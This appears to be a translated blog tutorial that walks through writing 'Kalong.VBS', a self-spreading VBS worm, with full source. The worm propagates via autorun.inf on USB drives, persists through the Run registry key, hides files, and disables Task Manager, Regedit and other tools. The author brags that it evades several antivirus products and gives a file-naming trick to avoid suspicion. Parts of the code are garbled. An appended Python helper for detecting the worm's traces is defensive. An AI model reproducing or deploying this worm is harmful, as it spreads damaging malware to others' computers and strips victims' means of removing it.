With the flash-disk virus fad going around, I suddenly came across a local piece of malcode written in the VBS language. It turns out that virus makers are beginning to turn to VBS. Perhaps this has to do with IPR (intellectual property rights), since many of the VB6.0 copies in circulation are pirated. So they write viruses in VBS, which needs nothing more than Windows Notepad, because the compiler for it, the Windows-based script host, is already integrated into Windows.
As promised, we will create a simple virus using Notepad. This virus spreads itself to removable disks through autorun, so that other computers become infected as soon as the flash disk is plugged in, without waiting for the user to run the infector. I have named this virus "Kalong.VBS". Now open Notepad and copy the following code:
'/ /-The beginning of the code, set for when the error is left and then continue the activities of virus-/ / on error resume next
'/ /-Dim following words-/ / dim rekur, windowpath, flashdrive, fs, mf, content, tf, bats, nt, check, sd
'/ / Set a text that will be made to Autorun Setup Information-/ / content = "[autorun]" & vbCrLf & "shellexecute = wscript.exe k4l0n6.dll.vbs" set fs = CreateObject ("Scripting.FileSystemObject") set mf = fs.getfile (Wscript.ScriptFullname) dim text, size size = mf.size check = mf.drive.drivetype set text = mf.openastextstream (1, -2) do while not text.atendofstream rekur = rekur & text.readline rekur = rekur & vbCrLf loop do
'/ /-Copy itself to become the master file in the Windows Path (example: C: \ Windows) Set windowpath = fs.getspecialfolder (0) set tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (windowpath & "\ batch-k4l0n6.dll.vbs", 2, true) tf.write recursive tf.close set tf = fs.getfile (windowpath & "\ batch-k4l0n6.dll.vbs") tf.attributes = 39 '/ /-Make Atorun.inf to run the virus automatically each flash disc plugged-/ / 'It spreads to every drive that bertype 1 and 2 (removable) including floppy disks
for EACH flashdrive in fs.drives '/ /-Check the Drive-/ / If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
'/ /-Make infector if it turns out Drivetypr 1 or 2. Or A: \ - / / set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 32 set tf = fs.createtextfile (flashdrive.path & "\ k4l0n6.dll.vbs", 2, true) tf.write recursive tf.close set tf = fs.getfile (flashdrive.path & "\ k4l0n6.dll.vbs") tf.attributes = 39
'/ /-Make the text of his Atorun.inf had already set up (Auto Setup Information) - / / set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 32 set tf = fs.createtextfile (flashdrive.path & "\ autorun.inf", 2, true) tf.write content tf.close set tf = fs.getfile (flashdrive.path & "\ autorun.inf") tf.attributes = 39 end if next
'/ /-Manipulation of the Registry-/ /
set bat = CreateObject ("WScript.Shell")
'/ /-Manip - Change Internet Explorer Title to The Bat vs. Zay-/ / kalong.regwrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Internet Explorer \ Main \ Window Title", "The Bat vs. Zay "
'/ /-Manip - Set for hidden files are not displayed in Explorer-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ Advanced \ Hidden", "0", "REG_DWORD"
'/ /-Manip - Eliminate the Find menu, Folder Options, Run, and block the Regedit and Task Manager-/ / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFind", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoFolderOptions", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoRun", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableRegistryTools", "1", "REG_DWORD" kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ System \ DisableTaskMgr", "1", "REG_DWORD"
'/ /-Manip - Disable right-click / / kalong.RegWrite "HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Policies \ Explorer \ NoViewContextMenu", "1", "REG_DWORD"
'/ /-Manip - Come up with messages every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Winlogon \ LegalNoticeCaption", "Worm Bat. Variant from Rangga-Zay, do not panic all data are safe. "
'/ /-Manip - On every Windows Startup-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Systemdir", windowpath & "\ batch-k4l0n6.dll.vbs"
'/ /-Manip - Change RegisteredOwner and Organization-/ / kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOrganization", "The Batrix" kalong.regwrite "HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ RegisteredOwner", "Bat"
'/ /-Now if the code below I do not know, please Mas Aat_S to explain-/ / if check <> 1 then Wscript.sleep 200 000 end if loop while check <> 1 set sd = CreateObject ("Wscript.shell") sd.run windowpath & "\ explorer.exe / e, / select," & Wscript.ScriptFullname 'End of Code
Save the code in Notepad via FILE > SAVE. In "Save as type" choose "All Files (*.*)". Save it under the name k4l0n6.dll.vbs. The *.dll part is not actually required, but it is an attempt to avoid suspicion.
Heh heh... This worm is not purely my own idea, because it imitates the Rangga-Zay virus code. But this one is better, because it was not detected by PCMAV RC15, ClamAV, or Avast. Consider it a lesson that making a virus/worm does not require buying pirated software. Notepad (from an original copy of Windows) will do.
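A triage helper for the two artifacts the script above leaves behind: the `autorun.inf` launch entry on removable drives and the policy values it sets under `Policies\Explorer` and `Policies\System`. This is an added example, not part of the original post; the function names, the `.reg` export and the `icon` line in the samples are constructed for illustration.

```python
import re
# Commands that start a script host or a script file.
SCRIPT_RE = re.compile(r"\b(wscript|cscript)(\.exe)?\b|\.(vbs|vbe|js|jse|wsf)\b", re.I)
# Policy values the script on this page sets to 1 (registry paths de-spaced).
POLICY_VALUES = {
    r"policies\explorer": {"nofind", "nofolderoptions", "norun", "noviewcontextmenu"},
    r"policies\system": {"disableregistrytools", "disabletaskmgr"},
}

def suspicious_autorun(text):
    """Return (key, command) pairs in an autorun.inf body that launch a script."""
    hits, in_autorun = [], False
    for line in map(str.strip, text.splitlines()):
        if line.startswith("["):
            in_autorun = line.lower() == "[autorun]"
        elif in_autorun and "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            k = key.lower()
            launches = k in ("open", "shellexecute") or (
                k.startswith("shell\\") and k.endswith("\\command"))
            if launches and SCRIPT_RE.search(value):
                hits.append((key, value))
    return hits

def tampered_policies(reg_export):
    """Return full value paths in a .reg export where a listed policy is dword 1."""
    found, section = [], ""
    for line in map(str.strip, reg_export.splitlines()):
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1]
        m = re.match(r'"([^"]+)"=dword:([0-9a-fA-F]{8})$', line)
        if m and int(m.group(2), 16) == 1:
            for suffix, names in POLICY_VALUES.items():
                if section.lower().endswith(suffix) and m.group(1).lower() in names:
                    found.append(section + "\\" + m.group(1))
    return found

# Constructed samples: the first two autorun lines are the text the page's script writes.
SAMPLE_AUTORUN = "[autorun]\r\nshellexecute = wscript.exe k4l0n6.dll.vbs\r\nicon = drive.ico\r\n"
SAMPLE_REG = r'''[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoRun"=dword:00000000
"NoFolderOptions"=dword:00000001
'''

if __name__ == "__main__":
    print(suspicious_autorun(SAMPLE_AUTORUN), tampered_policies(SAMPLE_REG), sep="\n")
```

A hit from either function on an endpoint or a removable drive is a reason to isolate the media and reset the listed policy values, not proof of this particular worm.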